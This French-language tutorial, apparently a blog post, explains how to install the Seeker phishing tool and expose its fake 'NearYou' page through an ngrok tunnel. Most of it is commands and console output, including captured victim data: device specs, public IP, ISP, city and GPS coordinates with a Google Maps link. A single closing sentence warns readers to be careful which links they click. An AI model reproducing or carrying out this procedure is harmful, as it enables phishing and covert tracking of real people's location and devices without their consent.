Seeker
Seeker est un programme qui permet de générer des liens de phishing, pour récuperer des identifiants, la géolocalisation, et pourquoi pas des informations sur le matériel qu’il utilise etc.
Installation de Seeker
1. Télécharger Seeker via git :
git clone https://github.com/thewhiteh4t/seeker.git
2. Se placer dans le dossier de Seeker et se donner les droits
cd seeker
chmod +x install.sh
3. Lancer l’installation du programme
./install.sh
4. Lancer le programme
./seeker.py
5. On arrive sur la page d’accueil du framework
┌──(root㉿kalivm)-[/home/…/sherlock/sherlock/Zen/seeker]
└─# ./seeker.py
__
______ ____ ____ | | __ ____ _______
/ ___/_/ __ \_/ __ \ | |/ /_/ __ \\_ __ \
\___ \ \ ___/\ ___/ | < \ ___/ | | \/
/____ > \___ >\___ >|__|_ \ \___ >|__|
\/ \/ \/ \/ \/
[>] Created By : thewhiteh4t
|---> Twitter : https://twitter.com/thewhiteh4t
|---> Community : https://twc1rcle.com/
[>] Version : 1.2.8
[!] Select a Template :
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] WhatsApp Redirect
[4] Telegram
[5] Zoom
[6] Google ReCaptcha
[7] Custom Link Preview
[>]
Installation de Ngrok
Pour que Seeker puisse créer des liens sortant vers le web, nous avons besoin de Ngrok qui nous fera un tunnel de notre Hôte vers le Web.
1. Télécharger Ngrok via ce lien
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
2. Se placer dans le dossier de Ngrok
cd Ngrok
Utilisation de Seeker
1. Lancer Seeker
┌──(root㉿kalivm)-[/home/…/sherlock/sherlock/Zen/seeker]
└─# ./seeker.py
__
______ ____ ____ | | __ ____ _______
/ ___/_/ __ \_/ __ \ | |/ /_/ __ \\_ __ \
\___ \ \ ___/\ ___/ | < \ ___/ | | \/
/____ > \___ >\___ >|__|_ \ \___ >|__|
\/ \/ \/ \/ \/
[>] Created By : thewhiteh4t
|---> Twitter : https://twitter.com/thewhiteh4t
|---> Community : https://twc1rcle.com/
[>] Version : 1.2.8
[!] Select a Template :
[0] NearYou
[1] Google Drive
[2] WhatsApp
[3] WhatsApp Redirect
[4] Telegram
[5] Zoom
[6] Google ReCaptcha
[7] Custom Link Preview
[>]
2. Choisir un template pour la page de piège et entrer le code, je vais choisir NearYou
[+] Loading NearYou Template...
[+] Port : 8080
[+] Starting PHP Server...[ ✔ ]
[+] Waiting for Client...[ctrl+c to exit]
3. Dans un autre terminal, lancer le serveur Ngrok sur le port 8080
ngrok http 8080
4. On arrive sur la page de Ngrok qui nous donne les liens sortants de notre machine. Ce sont ces liens qui vont permettre de compromettre les informations de la victime.
5. Voici à quoi ressemble le template NearYou
Il faut que la victime clique sur le bouton Continue et accepte l’accès à la localisation, instantanément, du côté attaquant, nous récupérons toutes les informations du device, ainsi que la position géographique de l’appareil et le programme sort aussi directement un lien Google Map de la position avec une grande précision, d’autant plus si c’est un smartphone.
[!] Device Information :
[+] OS : Win64
[+] Platform : Win32
[+] CPU Cores : 8
[+] RAM : 8
[+] GPU Vendor : Google Inc. (NVIDIA)
[+] GPU : ANGLE (NVIDIA, NVIDIA GeForce RTX 2060 Direct3D11 vs_5_0 ps_5_0
, D3D11)
[+] Resolution : 2560x1440
[+] Browser : Chrome/109.0.0.0
[+] Public IP : 90.84.181.108
[!] IP Information :
[+] Continent : Europe
[+] Country : France
[+] Region : Île-de-France
[+] City : Moisenay
[+] Org : OBS OCB HONEY
[+] ISP : Orange S.A.
[!] Location Information :
[+] Latitude : 46.4245887 deg
[+] Longitude : 0.8616919 deg
[+] Accuracy : 20 m
[+] Altitude : Not Available
[+] Direction : Not Available
[+] Speed : Not Available
[+] Google Maps : https://www.google.com/maps/place/46.4245887+0.8616919
[+] Data Saved : /home/kali/Bureau/sherlock/sherlock/Zen/seeker/db/results.csv
[+] Waiting for Client...[ctrl+c to exit]
Voici ce que nous donne le lien Google Maps :
Il faut bien faire attention sur quel lien on clique, on ne sait jamais vraiment ce qui peut se cacher derrière.